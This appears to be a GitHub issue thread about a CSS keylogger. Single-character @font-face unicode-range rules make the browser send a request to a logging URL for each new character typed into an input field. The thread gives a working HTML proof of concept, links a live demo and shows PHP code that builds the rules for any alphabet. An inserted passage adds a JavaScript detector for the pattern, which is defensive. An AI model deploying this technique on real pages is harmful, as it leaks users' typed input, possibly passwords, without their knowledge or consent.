Keylogger using webfont with single character unicode-range
Opened this issue · 4 comments
myfonj commented
Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:
```html
<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log
```
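A defensive check for the pattern in the post above, as an added example that is not part of the original thread or of the project: it scans stylesheet text for a font family split into single-code-point `@font-face` rules that each have a fetchable `url()` source. The function names and the `minFaces` threshold are assumptions made for this example.

```javascript
// Parse a unicode-range value ("U+61", "U+4??", "U+30-39, U+41") into the number
// of code points covered and the first code point; null if it cannot be parsed.
function parseRange(value) {
  let size = 0, first = null;
  for (const part of value.split(',')) {
    const m = /^U\+([0-9A-F?]{1,6})(?:-([0-9A-F]{1,6}))?$/i.exec(part.trim());
    if (!m) return null;
    const lo = parseInt(m[1].replace(/\?/g, '0'), 16);
    const hi = parseInt(m[2] || m[1].replace(/\?/g, 'F'), 16);
    if (first === null) first = lo;
    size += hi - lo + 1;
  }
  return { size, first };
}

// Report font families that have at least minFaces faces, each limited to one
// code point and each with a fetchable url() source. minFaces is an assumed
// threshold: legitimate subset fonts normally cover whole blocks, not single characters.
function findPerCharacterFonts(css, minFaces = 3) {
  const byFamily = new Map();
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ''); // strip CSS comments
  for (const [, body] of text.matchAll(/@font-face\s*\{([^}]*)\}/gi)) {
    const family = (/font-family\s*:\s*([^;]+)/i.exec(body) || [])[1];
    const range = parseRange((/unicode-range\s*:\s*([^;]+)/i.exec(body) || [])[1] || '');
    const urls = [...body.matchAll(/url\(\s*['"]?([^'")\s]+)/gi)]
      .map((m) => m[1])
      .filter((u) => !/^data:/i.test(u)); // data: URLs cause no request
    if (!family || !range || range.size !== 1 || urls.length === 0) continue;
    const key = family.trim().replace(/^['"]|['"]$/g, '').toLowerCase();
    if (!byFamily.has(key)) byFamily.set(key, []);
    byFamily.get(key).push({ char: String.fromCodePoint(range.first), url: urls[0] });
  }
  return [...byFamily]
    .filter(([, faces]) => faces.length >= minFaces)
    .map(([family, faces]) => ({ family, faces }));
}

// Constructed input: the four rules from the post plus an ordinary Latin subset font.
const SAMPLE_CSS = `
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
@font-face { font-family: "Body"; src: url(/fonts/body-latin.woff2); unicode-range: U+0000-00FF; }
`;

for (const { family, faces } of findPerCharacterFonts(SAMPLE_CSS)) {
  console.log(`font-family "${family}":`, faces.map((f) => `${f.char} -> ${f.url}`).join(', '));
}
```

The same function can be run over user-supplied or third-party CSS before it is served, or over stylesheets collected during a review of a page that renders untrusted styles.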
julianYaman commented
Why do you not make a pull request with these changes :D
Bogdaan commented
@myfonj brilliant idea. Live demo - https://jsfiddle.net/hcbogdan/6hmm2z47/
jbtronics commented
Very cool idea. Seems interesting. The problem is that we can only detect if a user types a char for the first time... But with word lists it should maybe be possible to guess the text a user has typed (at least when it is only a single word...)
Bogdaan commented
I wrote some code at
https://github.com/Bogdaan/spycss/blob/master/src/Interaction/Keylogger.php
Which generates valid unicode-range: U+XXXX from an alphabet.
For example:
```php
// set alphabet
$logThisChars = 'abcdefgABCDEFG';
// create input field
echo $s->builder()
    ->tag('input')
    ->attribute('name', 'field')
    ->interactions([
        new Keylogger($logThisChars)
    ])
    ->get();
```